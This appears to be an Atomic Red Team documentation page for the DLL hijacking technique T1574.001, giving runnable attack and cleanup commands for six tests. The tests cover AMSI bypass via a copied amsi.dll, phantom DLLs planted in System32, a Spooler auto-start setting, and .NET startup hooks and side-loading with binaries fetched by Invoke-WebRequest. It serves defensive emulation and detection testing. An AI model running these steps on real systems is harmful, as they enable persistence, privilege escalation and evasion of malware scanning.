Skip to content
Atomic Red Team
atomics
T1574.001

T1574.001 - Hijack Execution Flow: DLL

Description from ATT&CK (opens in a new tab)

Adversaries may abuse dynamic-link library files (DLLs) in order to achieve persistence, escalate privileges, and evade defenses. DLLs are libraries that contain code and data that can be simultaneously utilized by multiple programs. While DLLs are not malicious by nature, they can be abused through mechanisms such as side-loading, hijacking search order, and phantom DLL hijacking.(Citation: unit 42)

Specific ways DLLs are abused by adversaries include:

DLL Sideloading

Adversaries may execute their own malicious payloads by side-loading DLLs. Side-loading involves hijacking which DLL a program loads by planting and then invoking a legitimate application that executes their payload(s).

Side-loading positions both the victim application and malicious payload(s) alongside each other. Adversaries likely use side-loading as a means of masking actions they perform under a legitimate, trusted, and potentially elevated system or software process. Benign executables used to side-load payloads may not be flagged during delivery and/or execution. Adversary payloads may also be encrypted/packed or otherwise obfuscated until loaded into the memory of the trusted process.

Adversaries may also side-load other packages, such as BPLs (Borland Package Library).(Citation: kroll bpl)

DLL Search Order Hijacking

Adversaries may execute their own malicious payloads by hijacking the search order that Windows uses to load DLLs. This search order is a sequence of special and standard search locations that a program checks when loading a DLL. An adversary can plant a trojan DLL in a directory that will be prioritized by the DLL search order over the location of a legitimate library. This will cause Windows to load the malicious DLL when it is called for by the victim program.(Citation: unit 42)

DLL Redirection

Adversaries may directly modify the search order via DLL redirection, which after being enabled (in the Registry or via the creation of a redirection file) may cause a program to load a DLL from a different location.(Citation: Microsoft redirection)(Citation: Microsoft - manifests/assembly)

Phantom DLL Hijacking

Adversaries may leverage phantom DLL hijacking by targeting references to non-existent DLL files. They may be able to load their own malicious DLL by planting it with the correct name in the location of the missing module.(Citation: Hexacorn DLL Hijacking)(Citation: Hijack DLLs CrowdStrike)

DLL Substitution

Adversaries may target existing, valid DLL files and substitute them with their own malicious DLLs, planting them with the same name and in the same location as the valid DLL file.(Citation: Wietze Beukema DLL Hijacking)

Programs that fall victim to DLL hijacking may appear to behave normally because malicious DLLs may be configured to also load the legitimate DLLs they were meant to replace, evading defenses.

Remote DLL hijacking can occur when a program sets its current directory to a remote location, such as a Web share, before loading a DLL.(Citation: dll pre load owasp)(Citation: microsoft remote preloading)

If a valid DLL is configured to run at a higher privilege level, then the adversary-controlled DLL that is loaded will also be executed at the higher level. In this case, the technique could be used for privilege escalation.

Atomic Tests


Atomic Test #1 - DLL Search Order Hijacking - amsi.dll

Adversaries can take advantage of insecure library loading by PowerShell to load a vulnerable version of amsi.dll in order to bypass AMSI (Anti-Malware Scanning Interface) https://enigma0x3.net/2017/07/19/bypassing-amsi-via-com-server-hijacking/ (opens in a new tab)

Upon successful execution, powershell.exe will be copied and renamed to updater.exe and load amsi.dll from a non-standard path.

Supported Platforms: Windows

auto_generated_guid: 8549ad4b-b5df-4a2d-a3d7-2aee9e7052a3

Attack Commands: Run with command_prompt! Elevation Required (e.g. root or admin)

copy %windir%\System32\windowspowershell\v1.0\powershell.exe %APPDATA%\updater.exe
copy %windir%\System32\amsi.dll %APPDATA%\amsi.dll
%APPDATA%\updater.exe -Command exit

Cleanup Commands:

del %APPDATA%\updater.exe >nul 2>&1
del %APPDATA%\amsi.dll >nul 2>&1


Atomic Test #2 - Phantom Dll Hijacking - WinAppXRT.dll

.NET components (a couple of DLLs loaded anytime .NET apps are executed) when they are loaded they look for an environment variable called APPX_PROCESS Setting the environmental variable and dropping the phantom WinAppXRT.dll in e.g. c:\windows\system32 (or any other location accessible via PATH) will ensure the WinAppXRT.dll is loaded everytime user launches an application using .NET.

Upon successful execution, amsi.dll will be copied and renamed to WinAppXRT.dll and then WinAppXRT.dll will be copied to system32 folder for loading during execution of any .NET application.

Supported Platforms: Windows

auto_generated_guid: 46ed938b-c617-429a-88dc-d49b5c9ffedb

Attack Commands: Run with command_prompt! Elevation Required (e.g. root or admin)

copy %windir%\System32\amsi.dll %APPDATA%\amsi.dll
ren %APPDATA%\amsi.dll WinAppXRT.dll
copy %APPDATA%\WinAppXRT.dll %windir%\System32\WinAppXRT.dll
reg add "HKEY_CURRENT_USER\Environment" /v APPX_PROCESS /t REG_EXPAND_SZ /d "1" /f

Cleanup Commands:

reg delete "HKEY_CURRENT_USER\Environment" /v APPX_PROCESS /f
del %windir%\System32\WinAppXRT.dll
del %APPDATA%\WinAppXRT.dll


Atomic Test #3 - Phantom Dll Hijacking - ualapi.dll

Re-starting the Print Spooler service leads to C:\Windows\System32\ualapi.dll being loaded A malicious ualapi.dll placed in the System32 directory will lead to its execution whenever the system starts

Upon successful execution, amsi.dll will be copied and renamed to ualapi.dll and then ualapi.dll will be copied to system32 folder for loading during system restart. Print Spooler service is also configured to auto start. Reboot of system is required

Supported Platforms: Windows

auto_generated_guid: 5898902d-c5ad-479a-8545-6f5ab3cfc87f

Attack Commands: Run with command_prompt! Elevation Required (e.g. root or admin)

copy %windir%\System32\amsi.dll %APPDATA%\amsi.dll
ren %APPDATA%\amsi.dll ualapi.dll
copy %APPDATA%\ualapi.dll %windir%\System32\ualapi.dll
sc config Spooler start=auto

Cleanup Commands:

del %windir%\System32\ualapi.dll
del %APPDATA%\ualapi.dll


Atomic Test #4 - DLL Side-Loading using the Notepad++ GUP.exe binary

GUP is an open source signed binary used by Notepad++ for software updates, and is vulnerable to DLL Side-Loading, thus enabling the libcurl dll to be loaded. Upon execution, calc.exe will be opened.

Supported Platforms: Windows

auto_generated_guid: 65526037-7079-44a9-bda1-2cb624838040

Inputs:

NameDescriptionTypeDefault Value
process_nameName of the created processstringcalculator.exe
gup_executableGUP is an open source signed binary used by Notepad++ for software updatespathPathToAtomicsFolder\T1574.002\bin\GUP.exe

Attack Commands: Run with command_prompt!

"#{gup_executable}"

Cleanup Commands:

taskkill /F /IM #{process_name} >nul 2>&1

Dependencies: Run with powershell!

Description: Gup.exe binary must exist on disk at specified location (#{gup_executable})
Check Prereq Commands:
if (Test-Path "#{gup_executable}") {exit 0} else {exit 1}
Get Prereq Commands:
New-Item -Type Directory (split-path "#{gup_executable}") -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.001/bin/GUP.exe?raw=true" -OutFile "#{gup_executable}"


Atomic Test #5 - DLL Side-Loading using the dotnet startup hook environment variable

Utilizing the dotnet_startup_hooks environment variable, this method allows for registering a global method in an assembly that will be executed whenever a .net core application is started. This unlocks a whole range of scenarios, from injecting a profiler to tweaking a static context in a given environment. blog post (opens in a new tab)

Supported Platforms: Windows

auto_generated_guid: d322cdd7-7d60-46e3-9111-648848da7c02

Inputs:

NameDescriptionTypeDefault Value
process_nameName of the created processstringcalculator.exe
preloader_dlllibrary for interfacing with the dotnet frameworkpathPathToAtomicsFolder\T1574.002\bin\preloader.dll

Attack Commands: Run with command_prompt!

set DOTNET_STARTUP_HOOKS="#{preloader_dll}"
dotnet -h > nul
echo.

Cleanup Commands:

taskkill /F /IM #{process_name} >nul 2>&1

Dependencies: Run with powershell!

Description: .Net SDK must be installed
Check Prereq Commands:
if (Test-Path "C:\Program Files\dotnet\dotnet.exe") {exit 0} else {exit 1}
Get Prereq Commands:
winget install Microsoft.DotNet.SDK.6 --accept-source-agreements --accept-package-agreements -h > $null
echo.
Description: preloader must exist
Check Prereq Commands:
if (Test-Path "#{preloader_dll}") {exit 0} else {exit 1}
Get Prereq Commands:
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.001/bin/preloader.dll?raw=true" -OutFile "#{preloader_dll}"


Atomic Test #6 - DLL Search Order Hijacking,DLL Sideloading Of KeyScramblerIE.DLL Via KeyScrambler.EXE

Various threat actors and malware have been found side loading a masqueraded "KeyScramblerIE.dll" through "KeyScrambler.exe", which can load further executables embedded in modified KeyScramblerIE.dll file.

Supported Platforms: Windows

auto_generated_guid: c095ad8e-4469-4d33-be9d-6f6d1fb21585

Attack Commands: Run with powershell! Elevation Required (e.g. root or admin)

Write-Host 1.Downloading KeyScrambler from official website to temp directory
Invoke-WebRequest -Uri "https://download.qfxsoftware.com/download/latest/KeyScrambler_Setup.exe" -OutFile $env:Temp\KeyScrambler_Setup.exe
Write-Host 2.Installing KeyScrambler with KeyScrambler_Setup.exe from temp directory
Start-Process -FilePath $env:Temp\KeyScrambler_Setup.exe -ArgumentList /S -Wait
Write-Host 3.Copying KeyScrambler.exe to temp folder,to avoid permission issues, which calls KeyScramblerIE.dll in CWD i.e. temp
Copy-Item "C:\Program Files (x86)\KeyScrambler\KeyScrambler.exe" -Destination $env:TEMP\KeyScrambler.exe
Write-Host 4.Executing KeyScrambler.exe, you should see a popup of missing KeyScramblerIE.dll, you can close this popup
Start-Process -FilePath $env:Temp\KeyScrambler.exe
Write-Host 5.A modified KeyScramblerIE.dll can be copied to temp, which can be misused by Attacker

Cleanup Commands:

Write-Host 1.Kindly close the popup window asking for KeyScramblerIE.dll ,so that it gets deleted.
 
Remove-Item -Path $env:Temp\KeyScrambler_Setup.exe
Start-Process -FilePath "C:\Program Files (x86)\KeyScrambler\Uninstall.exe" -ArgumentList /S -Wait
Remove-Item -Path $env:Temp\KeyScrambler.exe
Write-Host 2.KeyScrambler cleanup completed successfully.

T1573T1574.002